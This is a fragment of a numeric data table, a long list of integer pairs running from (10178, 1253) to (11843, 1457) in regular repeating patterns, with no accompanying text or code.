(10178, 1253),
(10179, 1253),
(10180, 1253),
(10181, 1253),
(10182, 1253),
(10183, 1253),
(10184, 1254),
(10185, 1254),
(10186, 1254),
(10187, 1254),
(10188, 1254),
(10189, 1254),
(10190, 1255),
(10191, 1255),
(10192, 1255),
(10193, 1255),
(10194, 1255),
(10195, 1255),
(10196, 1256),
(10197, 1256),
(10198, 1256),
(10199, 1256),
(10200, 1256),
(10201, 1256),
(10202, 1257),
(10203, 1257),
(10204, 1257),
(10205, 1257),
(10206, 1257),
(10207, 1257),
(10208, 1258),
(10209, 1258),
(10210, 1258),
(10211, 1258),
(10212, 1258),
(10213, 1258),
(10214, 1259),
(10215, 1259),
(10216, 1259),
(10217, 1259),
(10218, 1259),
(10219, 1259),
(10220, 1260),
(10221, 1261),
(10222, 1262),
(10223, 1263),
(10224, 1264),
(10225, 1265),
(10226, 1266),
(10227, 1267),
(10228, 1268),
(10229, 1269),
(10230, 1270),
(10231, 1271),
(10232, 1272),
(10233, 1273),
(10234, 1274),
(10235, 1275),
(10236, 1276),
(10237, 1277),
(10238, 1278),
(10239, 1279),
(10240, 1280),
(10241, 1281),
(10242, 1282),
(10243, 1283),
(10244, 1284),
(10245, 1285),
(10246, 1286),
(10247, 1287),
(10248, 1288),
(10249, 1289),
(10250, 1290),
(10251, 1291),
(10252, 1292),
(10253, 1293),
(10254, 1294),
(10255, 1295),
(10256, 1296),
(10257, 1297),
(10258, 1298),
(10259, 1299),
(10260, 1300),
(10261, 1301),
(10262, 1302),
(10263, 1303),
(10264, 1304),
(10265, 1305),
(10266, 1306),
(10267, 1307),
(10268, 1308),
(10269, 1309),
(10270, 1310),
(10271, 1311),
(10272, 1312),
(10273, 1313),
(10274, 1314),
(10275, 1315),
(10276, 1316),
(10277, 1317),
(10278, 1318),
(10279, 1319),
(10280, 1320),
(10281, 1321),
(10282, 1322),
(10283, 1323),
(10284, 1324),
(10285, 1325),
(10286, 1326),
(10287, 1327),
(10288, 1328),
(10289, 1329),
(10290, 1330),
(10291, 1331),
(10292, 1332),
(10293, 1333),
(10294, 1334),
(10295, 1335),
(10296, 1336),
(10297, 1337),
(10298, 1338),
(10299, 1339),
(10300, 1340),
(10301, 1341),
(10302, 1342),
(10303, 1343),
(10304, 1344),
(10305, 1345),
(10306, 1346),
(10307, 1347),
(10308, 1348),
(10309, 1349),
(10310, 1350),
(10311, 1351),
(10312, 1352),
(10313, 1353),
(10314, 1354),
(10315, 1355),
(10316, 1356),
(10317, 1357),
(10318, 1358),
(10319, 1359),
(10320, 1260),
(10321, 1261),
(10322, 1262),
(10323, 1263),
(10324, 1264),
(10325, 1265),
(10326, 1266),
(10327, 1267),
(10328, 1268),
(10329, 1269),
(10330, 1270),
(10331, 1271),
(10332, 1272),
(10333, 1273),
(10334, 1274),
(10335, 1275),
(10336, 1276),
(10337, 1277),
(10338, 1278),
(10339, 1279),
(10340, 1280),
(10341, 1281),
(10342, 1282),
(10343, 1283),
(10344, 1284),
(10345, 1285),
(10346, 1286),
(10347, 1287),
(10348, 1288),
(10349, 1289),
(10350, 1290),
(10351, 1291),
(10352, 1292),
(10353, 1293),
(10354, 1294),
(10355, 1295),
(10356, 1296),
(10357, 1297),
(10358, 1298),
(10359, 1299),
(10360, 1300),
(10361, 1301),
(10362, 1302),
(10363, 1303),
(10364, 1304),
(10365, 1305),
(10366, 1306),
(10367, 1307),
(10368, 1308),
(10369, 1309),
(10370, 1310),
(10371, 1311),
(10372, 1312),
(10373, 1313),
(10374, 1314),
(10375, 1315),
(10376, 1316),
(10377, 1317),
(10378, 1318),
(10379, 1319),
(10380, 1320),
(10381, 1321),
(10382, 1322),
(10383, 1323),
(10384, 1324),
(10385, 1325),
(10386, 1326),
(10387, 1327),
(10388, 1328),
(10389, 1329),
(10390, 1330),
(10391, 1331),
(10392, 1332),
(10393, 1333),
(10394, 1334),
(10395, 1335),
(10396, 1336),
(10397, 1337),
(10398, 1338),
(10399, 1339),
(10400, 1340),
(10401, 1341),
(10402, 1342),
(10403, 1343),
(10404, 1344),
(10405, 1345),
(10406, 1346),
(10407, 1347),
(10408, 1348),
(10409, 1349),
(10410, 1350),
(10411, 1351),
(10412, 1352),
(10413, 1353),
(10414, 1354),
(10415, 1355),
(10416, 1356),
(10417, 1357),
(10418, 1358),
(10419, 1359),
(10420, 1260),
(10421, 1260),
(10422, 1260),
(10423, 1260),
(10424, 1260),
(10425, 1260),
(10426, 1261),
(10427, 1261),
(10428, 1261),
(10429, 1261),
(10430, 1261),
(10431, 1261),
(10432, 1262),
(10433, 1262),
(10434, 1262),
(10435, 1262),
(10436, 1262),
(10437, 1262),
(10438, 1263),
(10439, 1263),
(10440, 1263),
(10441, 1263),
(10442, 1263),
(10443, 1263),
(10444, 1264),
(10445, 1264),
(10446, 1264),
(10447, 1264),
(10448, 1264),
(10449, 1264),
(10450, 1265),
(10451, 1265),
(10452, 1265),
(10453, 1265),
(10454, 1265),
(10455, 1265),
(10456, 1265),
(10457, 1265),
(10458, 1265),
(10459, 1266),
(10460, 1266),
(10461, 1266),
(10462, 1266),
(10463, 1266),
(10464, 1266),
(10465, 1267),
(10466, 1267),
(10467, 1267),
(10468, 1267),
(10469, 1267),
(10470, 1267),
(10471, 1268),
(10472, 1268),
(10473, 1268),
(10474, 1268),
(10475, 1268),
(10476, 1268),
(10477, 1269),
(10478, 1269),
(10479, 1269),
(10480, 1269),
(10481, 1269),
(10482, 1269),
(10483, 1270),
(10484, 1270),
(10485, 1270),
(10486, 1270),
(10487, 1270),
(10488, 1270),
(10489, 1271),
(10490, 1271),
(10491, 1271),
(10492, 1271),
(10493, 1271),
(10494, 1271),
(10495, 1272),
(10496, 1272),
(10497, 1272),
(10498, 1272),
(10499, 1272),
(10500, 1272),
(10501, 1273),
(10502, 1273),
(10503, 1273),
(10504, 1273),
(10505, 1273),
(10506, 1273),
(10507, 1274),
(10508, 1274),
(10509, 1274),
(10510, 1274),
(10511, 1274),
(10512, 1274),
(10513, 1275),
(10514, 1275),
(10515, 1275),
(10516, 1275),
(10517, 1275),
(10518, 1275),
(10519, 1276),
(10520, 1276),
(10521, 1276),
(10522, 1276),
(10523, 1276),
(10524, 1276),
(10525, 1277),
(10526, 1277),
(10527, 1277),
(10528, 1277),
(10529, 1277),
(10530, 1277),
(10531, 1278),
(10532, 1278),
(10533, 1278),
(10534, 1278),
(10535, 1278),
(10536, 1278),
(10537, 1279),
(10538, 1279),
(10539, 1279),
(10540, 1279),
(10541, 1279),
(10542, 1279),
(10543, 1280),
(10544, 1280),
(10545, 1280),
(10546, 1280),
(10547, 1280),
(10548, 1280),
(10549, 1281),
(10550, 1281),
(10551, 1281),
(10552, 1281),
(10553, 1281),
(10554, 1281),
(10555, 1281),
(10556, 1281),
(10557, 1281),
(10558, 1282),
(10559, 1282),
(10560, 1282),
(10561, 1282),
(10562, 1282),
(10563, 1282),
(10564, 1283),
(10565, 1283),
(10566, 1283),
(10567, 1283),
(10568, 1283),
(10569, 1283),
(10570, 1284),
(10571, 1284),
(10572, 1284),
(10573, 1284),
(10574, 1284),
(10575, 1284),
(10576, 1285),
(10577, 1285),
(10578, 1285),
(10579, 1285),
(10580, 1285),
(10581, 1285),
(10582, 1286),
(10583, 1286),
(10584, 1286),
(10585, 1286),
(10586, 1286),
(10587, 1286),
(10588, 1287),
(10589, 1287),
(10590, 1287),
(10591, 1287),
(10592, 1287),
(10593, 1287),
(10594, 1288),
(10595, 1288),
(10596, 1288),
(10597, 1288),
(10598, 1288),
(10599, 1288),
(10600, 1289),
(10601, 1289),
(10602, 1289),
(10603, 1289),
(10604, 1289),
(10605, 1289),
(10606, 1290),
(10607, 1290),
(10608, 1290),
(10609, 1290),
(10610, 1290),
(10611, 1290),
(10612, 1291),
(10613, 1291),
(10614, 1291),
(10615, 1291),
(10616, 1291),
(10617, 1291),
(10618, 1292),
(10619, 1292),
(10620, 1292),
(10621, 1292),
(10622, 1292),
(10623, 1292),
(10624, 1293),
(10625, 1293),
(10626, 1293),
(10627, 1293),
(10628, 1293),
(10629, 1293),
(10630, 1294),
(10631, 1294),
(10632, 1294),
(10633, 1294),
(10634, 1294),
(10635, 1294),
(10636, 1295),
(10637, 1295),
(10638, 1295),
(10639, 1295),
(10640, 1295),
(10641, 1295),
(10642, 1296),
(10643, 1296),
(10644, 1296),
(10645, 1296),
(10646, 1296),
(10647, 1296),
(10648, 1297),
(10649, 1297),
(10650, 1297),
(10651, 1297),
(10652, 1297),
(10653, 1297),
(10654, 1297),
(10655, 1297),
(10656, 1297),
(10657, 1298),
(10658, 1298),
(10659, 1298),
(10660, 1298),
(10661, 1298),
(10662, 1298),
(10663, 1299),
(10664, 1299),
(10665, 1299),
(10666, 1299),
(10667, 1299),
(10668, 1299),
(10669, 1300),
(10670, 1300),
(10671, 1300),
(10672, 1300),
(10673, 1300),
(10674, 1300),
(10675, 1301),
(10676, 1301),
(10677, 1301),
(10678, 1301),
(10679, 1301),
(10680, 1301),
(10681, 1302),
(10682, 1302),
(10683, 1302),
(10684, 1302),
(10685, 1302),
(10686, 1302),
(10687, 1303),
(10688, 1303),
(10689, 1303),
(10690, 1303),
(10691, 1303),
(10692, 1303),
(10693, 1304),
(10694, 1304),
(10695, 1304),
(10696, 1304),
(10697, 1304),
(10698, 1304),
(10699, 1305),
(10700, 1305),
(10701, 1305),
(10702, 1305),
(10703, 1305),
(10704, 1305),
(10705, 1306),
(10706, 1306),
(10707, 1306),
(10708, 1306),
(10709, 1306),
(10710, 1306),
(10711, 1307),
(10712, 1307),
(10713, 1307),
(10714, 1307),
(10715, 1307),
(10716, 1307),
(10717, 1308),
(10718, 1308),
(10719, 1308),
(10720, 1308),
(10721, 1308),
(10722, 1308),
(10723, 1309),
(10724, 1309),
(10725, 1309),
(10726, 1309),
(10727, 1309),
(10728, 1309),
(10729, 1310),
(10730, 1310),
(10731, 1310),
(10732, 1310),
(10733, 1310),
(10734, 1310),
(10735, 1311),
(10736, 1311),
(10737, 1311),
(10738, 1311),
(10739, 1311),
(10740, 1311),
(10741, 1312),
(10742, 1312),
(10743, 1312),
(10744, 1312),
(10745, 1312),
(10746, 1312),
(10747, 1313),
(10748, 1313),
(10749, 1313),
(10750, 1313),
(10751, 1313),
(10752, 1313),
(10753, 1313),
(10754, 1313),
(10755, 1313),
(10756, 1314),
(10757, 1314),
(10758, 1314),
(10759, 1314),
(10760, 1314),
(10761, 1314),
(10762, 1315),
(10763, 1315),
(10764, 1315),
(10765, 1315),
(10766, 1315),
(10767, 1315),
(10768, 1316),
(10769, 1316),
(10770, 1316),
(10771, 1316),
(10772, 1316),
(10773, 1316),
(10774, 1317),
(10775, 1317),
(10776, 1317),
(10777, 1317),
(10778, 1317),
(10779, 1317),
(10780, 1318),
(10781, 1318),
(10782, 1318),
(10783, 1318),
(10784, 1318),
(10785, 1318),
(10786, 1319),
(10787, 1319),
(10788, 1319),
(10789, 1319),
(10790, 1319),
(10791, 1319),
(10792, 1320),
(10793, 1320),
(10794, 1320),
(10795, 1320),
(10796, 1320),
(10797, 1320),
(10798, 1321),
(10799, 1321),
(10800, 1321),
(10801, 1321),
(10802, 1321),
(10803, 1321),
(10804, 1322),
(10805, 1322),
(10806, 1322),
(10807, 1322),
(10808, 1322),
(10809, 1322),
(10810, 1323),
(10811, 1323),
(10812, 1323),
(10813, 1323),
(10814, 1323),
(10815, 1323),
(10816, 1324),
(10817, 1324),
(10818, 1324),
(10819, 1324),
(10820, 1324),
(10821, 1324),
(10822, 1325),
(10823, 1325),
(10824, 1325),
(10825, 1325),
(10826, 1325),
(10827, 1325),
(10828, 1326),
(10829, 1326),
(10830, 1326),
(10831, 1326),
(10832, 1326),
(10833, 1326),
(10834, 1327),
(10835, 1327),
(10836, 1327),
(10837, 1327),
(10838, 1327),
(10839, 1327),
(10840, 1328),
(10841, 1328),
(10842, 1328),
(10843, 1328),
(10844, 1328),
(10845, 1328),
(10846, 1329),
(10847, 1329),
(10848, 1329),
(10849, 1329),
(10850, 1329),
(10851, 1329),
(10852, 1329),
(10853, 1329),
(10854, 1329),
(10855, 1330),
(10856, 1330),
(10857, 1330),
(10858, 1330),
(10859, 1330),
(10860, 1330),
(10861, 1331),
(10862, 1331),
(10863, 1331),
(10864, 1331),
(10865, 1331),
(10866, 1331),
(10867, 1332),
(10868, 1332),
(10869, 1332),
(10870, 1332),
(10871, 1332),
(10872, 1332),
(10873, 1333),
(10874, 1333),
(10875, 1333),
(10876, 1333),
(10877, 1333),
(10878, 1333),
(10879, 1334),
(10880, 1334),
(10881, 1334),
(10882, 1334),
(10883, 1334),
(10884, 1334),
(10885, 1335),
(10886, 1335),
(10887, 1335),
(10888, 1335),
(10889, 1335),
(10890, 1335),
(10891, 1336),
(10892, 1336),
(10893, 1336),
(10894, 1336),
(10895, 1336),
(10896, 1336),
(10897, 1337),
(10898, 1337),
(10899, 1337),
(10900, 1337),
(10901, 1337),
(10902, 1337),
(10903, 1338),
(10904, 1338),
(10905, 1338),
(10906, 1338),
(10907, 1338),
(10908, 1338),
(10909, 1339),
(10910, 1339),
(10911, 1339),
(10912, 1339),
(10913, 1339),
(10914, 1339),
(10915, 1340),
(10916, 1340),
(10917, 1340),
(10918, 1340),
(10919, 1340),
(10920, 1340),
(10921, 1341),
(10922, 1341),
(10923, 1341),
(10924, 1341),
(10925, 1341),
(10926, 1341),
(10927, 1342),
(10928, 1342),
(10929, 1342),
(10930, 1342),
(10931, 1342),
(10932, 1342),
(10933, 1343),
(10934, 1343),
(10935, 1343),
(10936, 1343),
(10937, 1343),
(10938, 1343),
(10939, 1344),
(10940, 1344),
(10941, 1344),
(10942, 1344),
(10943, 1344),
(10944, 1344),
(10945, 1345),
(10946, 1345),
(10947, 1345),
(10948, 1345),
(10949, 1345),
(10950, 1345),
(10951, 1345),
(10952, 1345),
(10953, 1345),
(10954, 1346),
(10955, 1346),
(10956, 1346),
(10957, 1346),
(10958, 1346),
(10959, 1346),
(10960, 1347),
(10961, 1347),
(10962, 1347),
(10963, 1347),
(10964, 1347),
(10965, 1347),
(10966, 1348),
(10967, 1348),
(10968, 1348),
(10969, 1348),
(10970, 1348),
(10971, 1348),
(10972, 1349),
(10973, 1349),
(10974, 1349),
(10975, 1349),
(10976, 1349),
(10977, 1349),
(10978, 1350),
(10979, 1350),
(10980, 1350),
(10981, 1350),
(10982, 1350),
(10983, 1350),
(10984, 1351),
(10985, 1351),
(10986, 1351),
(10987, 1351),
(10988, 1351),
(10989, 1351),
(10990, 1352),
(10991, 1352),
(10992, 1352),
(10993, 1352),
(10994, 1352),
(10995, 1352),
(10996, 1353),
(10997, 1353),
(10998, 1353),
(10999, 1353),
(11000, 1353),
(11001, 1353),
(11002, 1354),
(11003, 1354),
(11004, 1354),
(11005, 1354),
(11006, 1354),
(11007, 1354),
(11008, 1355),
(11009, 1355),
(11010, 1355),
(11011, 1355),
(11012, 1355),
(11013, 1355),
(11014, 1356),
(11015, 1356),
(11016, 1356),
(11017, 1356),
(11018, 1356),
(11019, 1356),
(11020, 1357),
(11021, 1357),
(11022, 1357),
(11023, 1357),
(11024, 1357),
(11025, 1357),
(11026, 1358),
(11027, 1358),
(11028, 1358),
(11029, 1358),
(11030, 1358),
(11031, 1358),
(11032, 1359),
(11033, 1359),
(11034, 1359),
(11035, 1359),
(11036, 1359),
(11037, 1359),
(11038, 1360),
(11039, 1361),
(11040, 1362),
(11041, 1363),
(11042, 1364),
(11043, 1365),
(11044, 1366),
(11045, 1367),
(11046, 1368),
(11047, 1369),
(11048, 1370),
(11049, 1371),
(11050, 1372),
(11051, 1373),
(11052, 1374),
(11053, 1375),
(11054, 1376),
(11055, 1377),
(11056, 1378),
(11057, 1379),
(11058, 1380),
(11059, 1381),
(11060, 1382),
(11061, 1383),
(11062, 1384),
(11063, 1385),
(11064, 1386),
(11065, 1387),
(11066, 1388),
(11067, 1389),
(11068, 1390),
(11069, 1391),
(11070, 1392),
(11071, 1393),
(11072, 1394),
(11073, 1395),
(11074, 1396),
(11075, 1397),
(11076, 1398),
(11077, 1399),
(11078, 1400),
(11079, 1401),
(11080, 1402),
(11081, 1403),
(11082, 1404),
(11083, 1405),
(11084, 1406),
(11085, 1407),
(11086, 1408),
(11087, 1409),
(11088, 1410),
(11089, 1411),
(11090, 1412),
(11091, 1413),
(11092, 1414),
(11093, 1415),
(11094, 1416),
(11095, 1417),
(11096, 1418),
(11097, 1419),
(11098, 1420),
(11099, 1421),
(11100, 1422),
(11101, 1423),
(11102, 1424),
(11103, 1425),
(11104, 1426),
(11105, 1427),
(11106, 1428),
(11107, 1429),
(11108, 1430),
(11109, 1431),
(11110, 1432),
(11111, 1433),
(11112, 1434),
(11113, 1435),
(11114, 1436),
(11115, 1437),
(11116, 1438),
(11117, 1439),
(11118, 1440),
(11119, 1441),
(11120, 1442),
(11121, 1443),
(11122, 1444),
(11123, 1445),
(11124, 1446),
(11125, 1447),
(11126, 1448),
(11127, 1449),
(11128, 1450),
(11129, 1451),
(11130, 1452),
(11131, 1453),
(11132, 1454),
(11133, 1455),
(11134, 1456),
(11135, 1457),
(11136, 1458),
(11137, 1459),
(11138, 1360),
(11139, 1361),
(11140, 1362),
(11141, 1363),
(11142, 1364),
(11143, 1365),
(11144, 1366),
(11145, 1367),
(11146, 1368),
(11147, 1369),
(11148, 1370),
(11149, 1371),
(11150, 1372),
(11151, 1373),
(11152, 1374),
(11153, 1375),
(11154, 1376),
(11155, 1377),
(11156, 1378),
(11157, 1379),
(11158, 1380),
(11159, 1381),
(11160, 1382),
(11161, 1383),
(11162, 1384),
(11163, 1385),
(11164, 1386),
(11165, 1387),
(11166, 1388),
(11167, 1389),
(11168, 1390),
(11169, 1391),
(11170, 1392),
(11171, 1393),
(11172, 1394),
(11173, 1395),
(11174, 1396),
(11175, 1397),
(11176, 1398),
(11177, 1399),
(11178, 1400),
(11179, 1401),
(11180, 1402),
(11181, 1403),
(11182, 1404),
(11183, 1405),
(11184, 1406),
(11185, 1407),
(11186, 1408),
(11187, 1409),
(11188, 1410),
(11189, 1411),
(11190, 1412),
(11191, 1413),
(11192, 1414),
(11193, 1415),
(11194, 1416),
(11195, 1417),
(11196, 1418),
(11197, 1419),
(11198, 1420),
(11199, 1421),
(11200, 1422),
(11201, 1423),
(11202, 1424),
(11203, 1425),
(11204, 1426),
(11205, 1427),
(11206, 1428),
(11207, 1429),
(11208, 1430),
(11209, 1431),
(11210, 1432),
(11211, 1433),
(11212, 1434),
(11213, 1435),
(11214, 1436),
(11215, 1437),
(11216, 1438),
(11217, 1439),
(11218, 1440),
(11219, 1441),
(11220, 1442),
(11221, 1443),
(11222, 1444),
(11223, 1445),
(11224, 1446),
(11225, 1447),
(11226, 1448),
(11227, 1449),
(11228, 1450),
(11229, 1451),
(11230, 1452),
(11231, 1453),
(11232, 1454),
(11233, 1455),
(11234, 1456),
(11235, 1457),
(11236, 1458),
(11237, 1459),
(11238, 1360),
(11239, 1360),
(11240, 1360),
(11241, 1360),
(11242, 1360),
(11243, 1360),
(11244, 1361),
(11245, 1361),
(11246, 1361),
(11247, 1361),
(11248, 1361),
(11249, 1361),
(11250, 1361),
(11251, 1361),
(11252, 1361),
(11253, 1362),
(11254, 1362),
(11255, 1362),
(11256, 1362),
(11257, 1362),
(11258, 1362),
(11259, 1363),
(11260, 1363),
(11261, 1363),
(11262, 1363),
(11263, 1363),
(11264, 1363),
(11265, 1364),
(11266, 1364),
(11267, 1364),
(11268, 1364),
(11269, 1364),
(11270, 1364),
(11271, 1365),
(11272, 1365),
(11273, 1365),
(11274, 1365),
(11275, 1365),
(11276, 1365),
(11277, 1366),
(11278, 1366),
(11279, 1366),
(11280, 1366),
(11281, 1366),
(11282, 1366),
(11283, 1367),
(11284, 1367),
(11285, 1367),
(11286, 1367),
(11287, 1367),
(11288, 1367),
(11289, 1368),
(11290, 1368),
(11291, 1368),
(11292, 1368),
(11293, 1368),
(11294, 1368),
(11295, 1369),
(11296, 1369),
(11297, 1369),
(11298, 1369),
(11299, 1369),
(11300, 1369),
(11301, 1370),
(11302, 1370),
(11303, 1370),
(11304, 1370),
(11305, 1370),
(11306, 1370),
(11307, 1371),
(11308, 1371),
(11309, 1371),
(11310, 1371),
(11311, 1371),
(11312, 1371),
(11313, 1372),
(11314, 1372),
(11315, 1372),
(11316, 1372),
(11317, 1372),
(11318, 1372),
(11319, 1373),
(11320, 1373),
(11321, 1373),
(11322, 1373),
(11323, 1373),
(11324, 1373),
(11325, 1374),
(11326, 1374),
(11327, 1374),
(11328, 1374),
(11329, 1374),
(11330, 1374),
(11331, 1375),
(11332, 1375),
(11333, 1375),
(11334, 1375),
(11335, 1375),
(11336, 1375),
(11337, 1376),
(11338, 1376),
(11339, 1376),
(11340, 1376),
(11341, 1376),
(11342, 1376),
(11343, 1377),
(11344, 1377),
(11345, 1377),
(11346, 1377),
(11347, 1377),
(11348, 1377),
(11349, 1377),
(11350, 1377),
(11351, 1377),
(11352, 1378),
(11353, 1378),
(11354, 1378),
(11355, 1378),
(11356, 1378),
(11357, 1378),
(11358, 1379),
(11359, 1379),
(11360, 1379),
(11361, 1379),
(11362, 1379),
(11363, 1379),
(11364, 1380),
(11365, 1380),
(11366, 1380),
(11367, 1380),
(11368, 1380),
(11369, 1380),
(11370, 1381),
(11371, 1381),
(11372, 1381),
(11373, 1381),
(11374, 1381),
(11375, 1381),
(11376, 1382),
(11377, 1382),
(11378, 1382),
(11379, 1382),
(11380, 1382),
(11381, 1382),
(11382, 1383),
(11383, 1383),
(11384, 1383),
(11385, 1383),
(11386, 1383),
(11387, 1383),
(11388, 1384),
(11389, 1384),
(11390, 1384),
(11391, 1384),
(11392, 1384),
(11393, 1384),
(11394, 1385),
(11395, 1385),
(11396, 1385),
(11397, 1385),
(11398, 1385),
(11399, 1385),
(11400, 1386),
(11401, 1386),
(11402, 1386),
(11403, 1386),
(11404, 1386),
(11405, 1386),
(11406, 1387),
(11407, 1387),
(11408, 1387),
(11409, 1387),
(11410, 1387),
(11411, 1387),
(11412, 1388),
(11413, 1388),
(11414, 1388),
(11415, 1388),
(11416, 1388),
(11417, 1388),
(11418, 1389),
(11419, 1389),
(11420, 1389),
(11421, 1389),
(11422, 1389),
(11423, 1389),
(11424, 1390),
(11425, 1390),
(11426, 1390),
(11427, 1390),
(11428, 1390),
(11429, 1390),
(11430, 1391),
(11431, 1391),
(11432, 1391),
(11433, 1391),
(11434, 1391),
(11435, 1391),
(11436, 1392),
(11437, 1392),
(11438, 1392),
(11439, 1392),
(11440, 1392),
(11441, 1392),
(11442, 1393),
(11443, 1393),
(11444, 1393),
(11445, 1393),
(11446, 1393),
(11447, 1393),
(11448, 1393),
(11449, 1393),
(11450, 1393),
(11451, 1394),
(11452, 1394),
(11453, 1394),
(11454, 1394),
(11455, 1394),
(11456, 1394),
(11457, 1395),
(11458, 1395),
(11459, 1395),
(11460, 1395),
(11461, 1395),
(11462, 1395),
(11463, 1396),
(11464, 1396),
(11465, 1396),
(11466, 1396),
(11467, 1396),
(11468, 1396),
(11469, 1397),
(11470, 1397),
(11471, 1397),
(11472, 1397),
(11473, 1397),
(11474, 1397),
(11475, 1398),
(11476, 1398),
(11477, 1398),
(11478, 1398),
(11479, 1398),
(11480, 1398),
(11481, 1399),
(11482, 1399),
(11483, 1399),
(11484, 1399),
(11485, 1399),
(11486, 1399),
(11487, 1400),
(11488, 1400),
(11489, 1400),
(11490, 1400),
(11491, 1400),
(11492, 1400),
(11493, 1401),
(11494, 1401),
(11495, 1401),
(11496, 1401),
(11497, 1401),
(11498, 1401),
(11499, 1402),
(11500, 1402),
(11501, 1402),
(11502, 1402),
(11503, 1402),
(11504, 1402),
(11505, 1403),
(11506, 1403),
(11507, 1403),
(11508, 1403),
(11509, 1403),
(11510, 1403),
(11511, 1404),
(11512, 1404),
(11513, 1404),
(11514, 1404),
(11515, 1404),
(11516, 1404),
(11517, 1405),
(11518, 1405),
(11519, 1405),
(11520, 1405),
(11521, 1405),
(11522, 1405),
(11523, 1406),
(11524, 1406),
(11525, 1406),
(11526, 1406),
(11527, 1406),
(11528, 1406),
(11529, 1407),
(11530, 1407),
(11531, 1407),
(11532, 1407),
(11533, 1407),
(11534, 1407),
(11535, 1408),
(11536, 1408),
(11537, 1408),
(11538, 1408),
(11539, 1408),
(11540, 1408),
(11541, 1409),
(11542, 1409),
(11543, 1409),
(11544, 1409),
(11545, 1409),
(11546, 1409),
(11547, 1409),
(11548, 1409),
(11549, 1409),
(11550, 1410),
(11551, 1410),
(11552, 1410),
(11553, 1410),
(11554, 1410),
(11555, 1410),
(11556, 1411),
(11557, 1411),
(11558, 1411),
(11559, 1411),
(11560, 1411),
(11561, 1411),
(11562, 1412),
(11563, 1412),
(11564, 1412),
(11565, 1412),
(11566, 1412),
(11567, 1412),
(11568, 1413),
(11569, 1413),
(11570, 1413),
(11571, 1413),
(11572, 1413),
(11573, 1413),
(11574, 1414),
(11575, 1414),
(11576, 1414),
(11577, 1414),
(11578, 1414),
(11579, 1414),
(11580, 1415),
(11581, 1415),
(11582, 1415),
(11583, 1415),
(11584, 1415),
(11585, 1415),
(11586, 1416),
(11587, 1416),
(11588, 1416),
(11589, 1416),
(11590, 1416),
(11591, 1416),
(11592, 1417),
(11593, 1417),
(11594, 1417),
(11595, 1417),
(11596, 1417),
(11597, 1417),
(11598, 1418),
(11599, 1418),
(11600, 1418),
(11601, 1418),
(11602, 1418),
(11603, 1418),
(11604, 1419),
(11605, 1419),
(11606, 1419),
(11607, 1419),
(11608, 1419),
(11609, 1419),
(11610, 1420),
(11611, 1420),
(11612, 1420),
(11613, 1420),
(11614, 1420),
(11615, 1420),
(11616, 1421),
(11617, 1421),
(11618, 1421),
(11619, 1421),
(11620, 1421),
(11621, 1421),
(11622, 1422),
(11623, 1422),
(11624, 1422),
(11625, 1422),
(11626, 1422),
(11627, 1422),
(11628, 1423),
(11629, 1423),
(11630, 1423),
(11631, 1423),
(11632, 1423),
(11633, 1423),
(11634, 1424),
(11635, 1424),
(11636, 1424),
(11637, 1424),
(11638, 1424),
(11639, 1424),
(11640, 1425),
(11641, 1425),
(11642, 1425),
(11643, 1425),
(11644, 1425),
(11645, 1425),
(11646, 1425),
(11647, 1425),
(11648, 1425),
(11649, 1426),
(11650, 1426),
(11651, 1426),
(11652, 1426),
(11653, 1426),
(11654, 1426),
(11655, 1427),
(11656, 1427),
(11657, 1427),
(11658, 1427),
(11659, 1427),
(11660, 1427),
(11661, 1428),
(11662, 1428),
(11663, 1428),
(11664, 1428),
(11665, 1428),
(11666, 1428),
(11667, 1429),
(11668, 1429),
(11669, 1429),
(11670, 1429),
(11671, 1429),
(11672, 1429),
(11673, 1430),
(11674, 1430),
(11675, 1430),
(11676, 1430),
(11677, 1430),
(11678, 1430),
(11679, 1431),
(11680, 1431),
(11681, 1431),
(11682, 1431),
(11683, 1431),
(11684, 1431),
(11685, 1432),
(11686, 1432),
(11687, 1432),
(11688, 1432),
(11689, 1432),
(11690, 1432),
(11691, 1433),
(11692, 1433),
(11693, 1433),
(11694, 1433),
(11695, 1433),
(11696, 1433),
(11697, 1434),
(11698, 1434),
(11699, 1434),
(11700, 1434),
(11701, 1434),
(11702, 1434),
(11703, 1435),
(11704, 1435),
(11705, 1435),
(11706, 1435),
(11707, 1435),
(11708, 1435),
(11709, 1436),
(11710, 1436),
(11711, 1436),
(11712, 1436),
(11713, 1436),
(11714, 1436),
(11715, 1437),
(11716, 1437),
(11717, 1437),
(11718, 1437),
(11719, 1437),
(11720, 1437),
(11721, 1438),
(11722, 1438),
(11723, 1438),
(11724, 1438),
(11725, 1438),
(11726, 1438),
(11727, 1439),
(11728, 1439),
(11729, 1439),
(11730, 1439),
(11731, 1439),
(11732, 1439),
(11733, 1440),
(11734, 1440),
(11735, 1440),
(11736, 1440),
(11737, 1440),
(11738, 1440),
(11739, 1441),
(11740, 1441),
(11741, 1441),
(11742, 1441),
(11743, 1441),
(11744, 1441),
(11745, 1441),
(11746, 1441),
(11747, 1441),
(11748, 1442),
(11749, 1442),
(11750, 1442),
(11751, 1442),
(11752, 1442),
(11753, 1442),
(11754, 1443),
(11755, 1443),
(11756, 1443),
(11757, 1443),
(11758, 1443),
(11759, 1443),
(11760, 1444),
(11761, 1444),
(11762, 1444),
(11763, 1444),
(11764, 1444),
(11765, 1444),
(11766, 1445),
(11767, 1445),
(11768, 1445),
(11769, 1445),
(11770, 1445),
(11771, 1445),
(11772, 1446),
(11773, 1446),
(11774, 1446),
(11775, 1446),
(11776, 1446),
(11777, 1446),
(11778, 1447),
(11779, 1447),
(11780, 1447),
(11781, 1447),
(11782, 1447),
(11783, 1447),
(11784, 1448),
(11785, 1448),
(11786, 1448),
(11787, 1448),
(11788, 1448),
(11789, 1448),
(11790, 1449),
(11791, 1449),
(11792, 1449),
(11793, 1449),
(11794, 1449),
(11795, 1449),
(11796, 1450),
(11797, 1450),
(11798, 1450),
(11799, 1450),
(11800, 1450),
(11801, 1450),
(11802, 1451),
(11803, 1451),
(11804, 1451),
(11805, 1451),
(11806, 1451),
(11807, 1451),
(11808, 1452),
(11809, 1452),
(11810, 1452),
(11811, 1452),
(11812, 1452),
(11813, 1452),
(11814, 1453),
(11815, 1453),
(11816, 1453),
(11817, 1453),
(11818, 1453),
(11819, 1453),
(11820, 1454),
(11821, 1454),
(11822, 1454),
(11823, 1454),
(11824, 1454),
(11825, 1454),
(11826, 1455),
(11827, 1455),
(11828, 1455),
(11829, 1455),
(11830, 1455),
(11831, 1455),
(11832, 1456),
(11833, 1456),
(11834, 1456),
(11835, 1456),
(11836, 1456),
(11837, 1456),
(11838, 1457),
(11839, 1457),
(11840, 1457),
(11841, 1457),
(11842, 1457),
(11843, 1457),
